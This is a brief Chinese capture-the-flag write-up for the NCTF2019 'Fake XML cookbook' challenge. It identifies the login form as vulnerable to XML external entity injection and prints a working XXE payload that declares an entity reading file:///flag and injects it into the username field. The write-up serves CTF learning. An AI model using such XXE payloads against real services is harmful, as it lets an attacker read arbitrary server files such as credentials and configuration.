[NCTF2019]Fake XML cookbook1

打开题目

猜测可能为sql注入,或者绕过,思路查看源码,看有用信息

试输入发现只会返回用户名错误,根据提示XML相对XXE攻击

首先进行抓包,然后构造payload。

复制代码
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///flag">
  ]>
<user><username>&admin;</username><password>123456</password></user>

直接就可以得到flag

相关推荐
阿华的代码王国4 小时前
【Android】相对布局应用-登录界面
android·xml·java
工藤新一OL5 小时前
把xml的格式从utf-8-bom转为utf-8
xml·c#·asp.net·.netcore·visual studio
henysugar8 小时前
便捷删除Android开发中XML中重复字符串资源的一个办法
android·xml
程序员编程指南8 小时前
Qt XML 与 JSON 数据处理方法
xml·c语言·c++·qt·json
龚子亦2 天前
【Unity开发】数据存储——XML
xml·unity·游戏引擎·数据存储·游戏开发
海哥编程3 天前
Python 进阶(七):XML 基本操作
xml·javascript·python
胖大和尚4 天前
删除 XML 格式中双引号内的空格
xml
中游鱼4 天前
使用C#对象将WinRiver项目文件进行复杂的XML序列化和反序列化实例详解
xml·c#·序列化和反序列化·属性的序列化和反序列化·完整序列化·adcp和winriver
WSSWWWSSW4 天前
JSX(JavaScript XML)‌简介
xml·开发语言·javascript
MediaTea4 天前
Python 库手册:xml.etree.ElementTree 处理 XML 数据模块
xml·java·前端·数据库·python